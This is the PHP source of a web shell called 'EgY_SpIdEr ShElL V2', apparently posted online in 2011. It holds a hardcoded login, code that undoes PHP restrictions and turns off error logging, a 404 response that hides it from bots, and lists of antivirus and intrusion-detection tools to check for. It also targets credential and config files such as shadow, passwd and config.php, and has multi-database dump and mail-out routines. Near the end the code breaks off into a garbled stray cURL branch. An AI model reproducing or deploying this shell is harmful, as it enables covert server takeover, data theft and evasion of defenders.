egy_spider.php
Saturday, December 03, 2011
<?
###########################################
# EgY_SpIdEr ShElL V2 #
# EgY_SpIdEr #
# www.egyspider.eu #
###########################################
//Change User & Password
$tacfgd['uname'] = 'egy_spider';
$tacfgd['pword'] = 'egy_spider';
// Title of page.
$tacfgd['title'] = 'EgY_SpIdEr ShElL';
// Text to appear just above login form.
$tacfgd['helptext'] = 'EgY SpIdEr ShElL';
// Set to true to enable the optional remember-me feature, which stores encrypted login details to
// allow users to be logged-in automatically on their return. Turn off for a little extra security.
$tacfgd['allowrm'] = true;
// If you have multiple protected pages, and there's more than one username / password combination,
// you need to group each combination under a distinct rmgroup so that the remember-me feature
// knows which login details to use.
$tacfgd['rmgroup'] = 'default';
// Set to true if you use your own sessions within your protected page, to stop txtAuth interfering.
// In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not
// destroy the session, so that is left up to you.
$tacfgd['ownsessions'] = false;
foreach ($tacfgd as $key => $val) {
if (!isset($tacfg[$key])) $tacfg[$key] = $val;
}
if (!$tacfg['ownsessions']) {
session_name('txtauth');
session_start();
}
// Logout attempt made. Deletes any remember-me cookie as well
if (isset($_GET['logout']) || isset($_POST['logout'])) {
setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
if (!$tacfg['ownsessions']) {
$_SESSION = array();
session_destroy();
}
else $_SESSION['txtauthin'] = false;
}
// Login attempt made
elseif (isset($_POST['login'])) {
if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
$_SESSION['txtauthin'] = true;
if ($_POST['rm']) {
// Set remember-me cookie for 2 weeks
setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
}
}
else $err = 'Login Faild !';
}
// Remember-me cookie exists
elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
$_SESSION['txtauthin'] = true;
}
else $err = 'Login Faild !';
}
if (!$_SESSION['txtauthin']) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
?>
<html dir=rtl>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title><?=$tacfg['title']?></title>
<STYLE>
BODY
{
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
}
tr {
BORDER-RIGHT: #dadada ;
BORDER-TOP: #dadada ;
BORDER-LEFT: #dadada ;
BORDER-BOTTOM: #dadada ;
color: #ffffff;
}
td {
BORDER-RIGHT: #dadada ;
BORDER-TOP: #dadada ;
BORDER-LEFT: #dadada ;
BORDER-BOTTOM: #dadada ;
color: #dadada;
}
.table1 {
BORDER: 1;
BACKGROUND-COLOR: #000000;
color: #333333;
}
.td1 {
BORDER: 1;
font: 7pt tahoma;
color: #ffffff;
}
.tr1 {
BORDER: 1;
color: #dadada;
}
table {
BORDER: #eeeeee outset;
BACKGROUND-COLOR: #000000;
color: #dadada;
}
input {
BORDER-RIGHT: #00FF00 1 solid;
BORDER-TOP: #00FF00 1 solid;
BORDER-LEFT: #00FF00 1 solid;
BORDER-BOTTOM: #00FF00 1 solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #dadada;;
}
submit {
BORDER: buttonhighlight 1 outset;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #dadada;
}
textarea {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #333333;
font: Fixedsys bold;
color: #ffffff;
}
BODY {
margin: 1;
color: #dadada;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
<body>
<br><br><div style="font-size: 14pt;" align="center"><?=$tacfg['title']?></div>
<hr width="300" size="1" noshade color="#cdcdcd">
<p>
<div align="center" class="grey">
<?=$tacfg['helptext']?>
</div>
<p>
<?
if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
?>
<form name="txtauth" action="<?=$action?>" method="post">
<div align="center">
<table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
<?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
<?if (isset($tacfg['uname'])) {?>
<tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
<?}?>
<tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
<?if ($tacfg['allowrm']) {?>
<tr><td align="left"><input type="submit" name="login" value="Login">
</td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm">
Remmeber Me?</label></td></tr>
<?} else {?>
<tr><td colspan="2" align="center">
<input type="submit" name="login" value="Login"></td></tr>
<?}?>
</table>
</div>
</form>
<br><br>
<hr width="300" size="1" noshade color="#cdcdcd">
<div class="smalltxt" align="center">Developed by
<a href="mailto:egy_spider@hotmail.com">EgY SpIdEr </a>· copyright ©
& EgY SpIdEr</div>
</body>
</html>
<?
// Don't delete this!
exit();
}
?>
Login As (<font color="#FF0000"><? echo $tacfgd['uname']; ?></font>) <a href="?logout=1">Logout</a></p>
<div align="right">
<?php
if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
$language='eng';
$auth = 0;
$name='7d1f6442a9ed59e62f93dcbc2695baa6';
$pass='7d1f6442a9ed59e62f93dcbc2695baa6';
//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
@setlocale(LC_ALL,'ru_RU.cp1251');
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);
}
else
{
@ini_alter('error_log',NULL);
@ini_alter('log_errors',0);
@ini_alter('file_uploads',1);
@ini_alter('allow_url_fopen',1);
}
error_reporting(E_ALL);
/* ??? ????? */
$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
$downloaders = array('wget','fetch','lynx','links','curl','get');
/* ??? ?????? ???????? ???? ????? realpath() */
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.01234567890";
$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
/******************************************************************************************************/
define("starttime",@getmicrotime());
if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@function_exists('ini_set'))
{
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
}
else
{
@ini_alter('max_execution_time',0);
@ini_alter('output_buffering',0);
}
$safe_mode = @ini_get('safe_mode');
#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
$version = '1.42';
if(@version_compare(@phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<h1>Access Denied</h1>");
}
}
if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
$tempdir='./';
$select_tempdir = '<select name=tempdir><option value="./">./</option>';
foreach( $tempdirs as $item) {
if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
}
$select_tempdir .= '</select>';
}else{
if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
$select_tempdir = $_COOKIE['select_tempdir'];
}
$head = '<!-- EgY_SpIdEr -->
<html>
<head>
<meta http-equiv="Content-Language" content="ar-sa">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>EgY_SpIdEr ShElL</title>
<STYLE>
BODY
{
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
}
tr {
BORDER-RIGHT: #333333 ;
BORDER-TOP: #333333 ;
BORDER-LEFT: #333333 ;
BORDER-BOTTOM: #333333 ;
color: #FFFFFF;
}
td {
BORDER-RIGHT: #333333 ;
BORDER-TOP: #333333 ;
BORDER-LEFT: #333333 ;
BORDER-BOTTOM: #333333 ;
color: #FFFFFF;
}
.table1 {
BORDER: 1;
BACKGROUND-COLOR: #000000;
color: #333333;
}
.td1 {
BORDER: 1;
font: 7pt tahoma;
color: #ffffff;
}
.tr1 {
BORDER: 1;
color: #333333;
}
table {
BORDER: #eeeeee outset;
BACKGROUND-COLOR: #000000;
color: #333333;
}
input {
BORDER-RIGHT: #00FF00 1 solid;
BORDER-TOP: #00FF00 1 solid;
BORDER-LEFT: #00FF00 1 solid;
BORDER-BOTTOM: #00FF00 1 solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #333333;;
}
submit {
BORDER: buttonhighlight 1 outset;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #333333;
}
textarea {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #333333;
font: Fixedsys bold;
color: #ffffff;
}
BODY {
margin: 1;
color: #333333;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function moreread($temp){
global $lang,$language;
$str='';
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
if($ffile){
while(!@feof($ffile)){$str .= @fgets($ffile);};
fclose($ffile);
}
}elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
if($ffile){
$str = @fread($ffile, @filesize($temp));
@fclose($ffile);
}
}elseif(@function_exists('file')&&($ffiles = @file($temp))){
foreach ($ffiles as $ffile) { $str .= $ffile; }
}elseif(@function_exists('file_get_contents')){
$str = @file_get_contents($temp);
}elseif(@function_exists('readfile')){
$str = @readfile($temp);
}elseif(@function_exists('highlight_file')){
$str = @highlight_file($temp);
}elseif(@function_exists('show_source')){
$str = @show_source($temp);
}else{echo $lang[$language.'_text56'];}
return $str;
}
function readzlib($filename,$temp=''){
global $lang,$language;
$str='';
if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
if(@copy("compress.zlib://".$filename, $temp)) {
$str = moreread($temp);
} else echo $lang[$language.'_text119'];
@unlink($temp);
return $str;
}
function morewrite($temp,$str='')
{
global $lang,$language;
if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fwrite($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fputs($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('file_put_contents')){
@file_put_contents($temp,$str);
}else return 0;
return 1;
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!@function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!@function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!@function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
case 'MySQLi':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysqli_connect')) return 0;
$this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
if(is_resource($this->connection)) return 1;
break;
case 'mSQL':
if(!@function_exists('msql_connect')) return 0;
$this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'SQLite':
if(!@function_exists('sqlite_open')) return 0;
$this->connection = @sqlite_open($this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
case 'MySQLi':
return 1;
break;
case 'mSQL':
if(@msql_select_db($this->base,$this->connection)) return 1;
break;
case 'SQLite':
return 1;
break;
}
return 0;
}
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
case 'MySQLi':
if(false===($this->res=@mysqli_query($this->connection,$query)))
{
$this->error = @mysqli_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'mSQL':
if(false===($this->res=@msql_query($query,$this->connection)))
{
$this->error = @msql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'SQLite':
if(false===($this->res=@sqlite_query($this->connection,$query)))
{
$this->error = @sqlite_error_string($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MySQLi':
$this->num_rows=@mysqli_num_rows($this->res);
$this->num_fields=@mysqli_num_fields($this->res);
while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
@mysqli_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'mSQL':
$this->num_rows=@msql_num_rows($this->res);
$this->num_fields=@msql_num_fields($this->res);
while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
@msql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'SQLite':
$this->num_rows=@sqlite_num_rows($this->res);
$this->num_fields=@sqlite_num_fields($this->res);
while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MySQLi':
$this->dump[0] = '## MySQLi dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'mSQL':
$this->dump[0] = '## mSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'SQLite':
$this->dump[0] = '## SQLite dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
case 'MySQLi':
@mysqli_close($this->connection);
break;
case 'mSQL':
@msql_close($this->connection);
break;
case 'SQLite':
@sqlite_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
case 'MySQLi':
return @mysqli_affected_rows($this->res);
break;
case 'mSQL':
return @msql_affected_rows($this->res);
break;
case 'SQLite':
return @sqlite_changes($this->res);
break;
default:
return 0;
break;
break;
case 'cURL':
if(empty($_POST['egy_spider'])){
} else {
$curl=$_POST['egy_spider'];
